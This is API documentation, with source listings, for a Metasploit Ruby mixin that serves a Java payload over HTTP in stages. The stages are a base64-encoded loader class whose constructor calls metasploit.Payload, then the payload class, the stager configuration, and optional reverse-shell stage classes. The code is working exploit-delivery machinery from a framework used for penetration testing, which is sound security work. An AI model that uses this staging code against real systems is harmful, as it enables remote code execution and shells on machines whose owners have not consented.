Module: Msf::Exploit::Remote::Java::HTTP::ClassLoader
- Includes:
- HttpServer
- Defined in:
- lib/msf/core/exploit/remote/java/http/class_loader.rb
Instance Attribute Summary
Attributes included from SocketServer
Instance Method Summary
- #class_name ⇒ Object
- #constructor_class ⇒ Object
import metasploit.Payload;.
- #initialize(info = {}) ⇒ Object
- #java_class_loader_on_request_uri(cli, request) ⇒ Object
- #java_class_loader_resource_uri ⇒ Object
- #java_class_loader_start_service(opts = {}) ⇒ Object
- #packed_class_name ⇒ Object
Methods included from HttpServer
#add_resource, #add_robots_resource, #autofilter, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #on_request_uri, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #start_service, #use_zlib
Methods included from Auxiliary::Report
#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot
Methods included from Metasploit::Framework::Require
optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines
Methods included from TcpServer
#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version, #start_service
Methods included from SocketServer
#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #start_service, #via_string
Instance Method Details
#class_name ⇒ Object
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 128

# Name of the generated loader class, memoised for the life of the module
# instance so every stage refers to the same class.  The name is random
# alphabetic text of 8..42 characters with only the first letter upper-cased.
#
# @return [String] the loader class name
def class_name
  @class_name ||= begin
    random_name = rand_text_alpha(8..42)
    random_name.capitalize
  end
end
#constructor_class ⇒ Object
import metasploit.Payload;
public class Metasploit {
public Metasploit() {
try {
Payload.main(null);
}
catch (Exception e) {}
}
}
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 112

# Bytecode of the small loader class whose no-arg constructor calls
# metasploit.Payload#main (the Java source is shown in the method
# description), with the class-file constant "Metasploit" swapped for
# #class_name.
#
# The base64 below is a precompiled class file (it decodes to the 0xCAFEBABE
# magic); only the length-prefixed UTF8 constant-pool entry holding the class
# name is rewritten, everything else is served as compiled.
#
# @return [String] binary class-file contents
def constructor_class
  encoded = <<~EOF
    yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAN
    U3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNqYXZhL2xhbmcvRXhjZXB0aW9u
    AQAKTWV0YXNwbG9pdAEAEGphdmEvbGFuZy9PYmplY3QBABJtZXRhc3Bsb2l0L1BheWxvYWQB
    AARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgA
    AAA3AAEAAgAAAA0qtwABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgAB
    BwALAAAA
  EOF
  bytecode = Rex::Text.decode_base64(encoded)

  # The constant-pool entry is "\x00\x0a" (big-endian u2 length, 10) followed
  # by "Metasploit"; #packed_class_name produces the same layout for the
  # random name.  A plain String pattern is used, so the match is literal.
  bytecode.sub("\x00\x0aMetasploit", packed_class_name)
end
#initialize(info = {}) ⇒ Object
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 12

# Initialises the mixin, setting the module's 'Stance' to
# Msf::Exploit::Stance::Aggressive before handing the metadata to the
# superclass.
#
# @param info [Hash] module metadata, merged via update_info
def initialize(info = {})
  stance_info = update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive)
  super(stance_info)
end
#java_class_loader_on_request_uri(cli, request) ⇒ Object
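# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 41

# HTTP request handler for the class-loader service.
#
# Serves the staged class-loader resources located beneath
# #java_class_loader_resource_uri.  Only GET and HEAD are honoured; any other
# method is logged and ignored (nothing is written back).  HEAD answers an
# empty 200 for the three core resources and 404 otherwise; GET returns the
# resource body as application/octet-stream, or 404 when the path is unknown.
#
# @param cli [Rex::Proto::Http::ServerClient] the connected client
# @param request [Rex::Proto::Http::Request] the parsed request
# @return [void]
def java_class_loader_on_request_uri(cli, request)
  vprint_status("#{request.method} #{request.uri} requested")

  unless %w[HEAD GET].include?(request.method)
    vprint_error("Ignoring #{request.method} request")
    return
  end

  # Path relative to the service root.  raw_uri is the request-line path as
  # the client sent it, so resource is still client-controlled text here and
  # must match one of the exact names/patterns below before it is used.
  resource = request.raw_uri.delete_prefix(java_class_loader_resource_uri)

  return java_class_loader_handle_head(cli, resource) if request.method == 'HEAD'

  body = java_class_loader_resource_body(resource)
  if body.nil?
    vprint_error('Sending 404')
    return send_not_found(cli)
  end

  send_response(
    cli,
    body,
    # file -I says application/x-java-applet, but I don't believe it
    'Content-Type' => 'application/octet-stream'
  )
end

# Answers a HEAD request: an empty 200 for the three resources the loader
# always needs, 404 for anything else.
#
# NOTE(review): the optional javapayload/stage/*.class resources served on GET
# are not in this list, so a HEAD for them returns 404.  That is the original
# behaviour and is kept as-is.
#
# @param cli [Rex::Proto::Http::ServerClient] the connected client
# @param resource [String] path relative to the service root
# @return [void]
def java_class_loader_handle_head(cli, resource)
  known = %W[
    #{class_name}.class
    metasploit/Payload.class
    metasploit.dat
  ]

  unless known.include?(resource)
    vprint_error('Sending 404')
    return send_not_found(cli)
  end

  vprint_good('Sending 200')
  send_response(cli, '')
end

# Resolves a resource path to the bytes to serve.
#
# @param resource [String] path relative to the service root
# @return [String, nil] the body, or nil when the path is not a known resource
def java_class_loader_resource_body(resource)
  case resource
  # Stage 1
  when "#{class_name}.class"
    vprint_good('Sending the constructor class')
    # This contains the constructor that will call our JavaPayload
    constructor_class
  # Stage 2
  when 'metasploit/Payload.class'
    vprint_good('Sending the main payload class')
    # This is our JavaPayload as a compiled class
    MetasploitPayloads.read('java/metasploit/Payload.class')
  # Stage 3
  when 'metasploit.dat'
    vprint_good('Sending the payload configuration data')
    # This tells the target how to address the payload; this is the magic!
    payload_instance.stager_config
  # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp.
  # Anchored with \A and \z rather than ^ and $ so the whole of resource, not
  # just one line of it, must be one of the three fixed class names before it
  # is interpolated into the MetasploitPayloads read path.
  when %r{\Ajavapayload/stage/(?:Shell|Stage|StreamForwarder)\.class\z}
    vprint_good("Sending additional payload class: #{resource}")
    MetasploitPayloads.read("java/#{resource}")
  end
end

private :java_class_loader_handle_head, :java_class_loader_resource_body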
#java_class_loader_resource_uri ⇒ Object
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 33

# Root path of the class-loader service, memoised on first use.
#
# Derived from #resource_uri with a trailing "/" appended when missing: the
# resource URI must end in / for the class loading to work.
#
# @return [String] the service root path, always ending in "/"
def java_class_loader_resource_uri
  @java_class_loader_resource_uri ||= begin
    base = resource_uri
    base.end_with?('/') ? base : "#{base}/"
  end
end
#java_class_loader_start_service(opts = {}) ⇒ Object
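# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 18

# Starts the HTTP service that serves the class-loader resources and returns
# its URL.
#
# The request handler is registered under opts['Uri'] (any keys the caller
# already placed there win); 'Path' defaults to #java_class_loader_resource_uri
# unless opts['Path'] is given.  Note that opts is mutated.
#
# @param opts [Hash] options forwarded to start_service
# @return [String] the service URL from get_uri
def java_class_loader_start_service(opts = {})
  # XXX: This is a workaround until we can take SSL in opts.  The datastore
  # value is swapped out only while the listener is being started and is put
  # back in an ensure block, so a failure inside start_service cannot leave
  # SSL disabled for the rest of the module run.
  ssl = datastore['SSL']
  begin
    datastore['SSL'] = false

    opts['Uri'] = {
      'Proc' => proc { |cli, req| java_class_loader_on_request_uri(cli, req) },
      'Path' => opts['Path'] || java_class_loader_resource_uri
    }.update(opts['Uri'] || {})

    start_service(opts)
  ensure
    datastore['SSL'] = ssl
  end

  get_uri
end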
#packed_class_name ⇒ Object
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 132

# #class_name in the length-prefixed form used by class-file UTF8 constants:
# a big-endian two-byte length followed by the name itself.
#
# @return [String] the packed name
def packed_class_name
  name = class_name
  length_prefix = [name.length].pack('n')
  "#{length_prefix}#{name}"
end